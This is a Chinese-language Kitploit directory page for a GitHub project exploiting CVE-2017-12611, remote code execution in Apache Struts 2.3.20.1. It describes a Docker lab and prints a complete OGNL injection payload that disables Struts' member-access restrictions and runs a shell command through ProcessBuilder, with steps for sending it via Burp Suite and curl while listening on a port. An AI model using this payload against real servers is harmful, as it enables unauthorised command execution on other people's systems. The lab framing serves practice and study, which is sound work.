Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-12611_Exploit — RCE 项目 | Kitploit
工具/GitHubGitHub/zeynepsilao/cve-2017-12611_exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试实验室与实践
GitHubzeynepsilao/cve-2017-12611_exploit

CVE-2017-12611_Exploit

RCE 项目

查看仓库
311个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-12611 项目

概述:

使用给定的 payload 可实现远程代码执行(RCE)攻击。

环境与工具

以下列出了在隔离的个人实验室中进行测试和验证所需的环境和工具。

  • 主机操作系统:Ubuntu 18.04.6
  • 攻击者操作系统:Kali Linux
  • 容器平台:Docker
  • 目标应用栈:Apache Struts 2.3.20.1
  • 附加组件:Burp Suite

环境搭建:

通过以下命令:

root@kitploit:~
docker compose up -d 

您可以运行该环境。之后,访问 http://<YOUR_IP>:8080/hello.action 即可看到提交页面。

Payload:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

为了执行 RCE 攻击,必须使用 Burp Suite。在使用 Burp Suite 时,提交该 payload。提交后,找到正确的日志(POST)并将其转换为 curl 命令。最后,打开您的攻击机,在监听端口上监听,然后从监听器端口发送您的 curl 命令。

备注:

被遮盖的部分为 IP 地址。

下载工具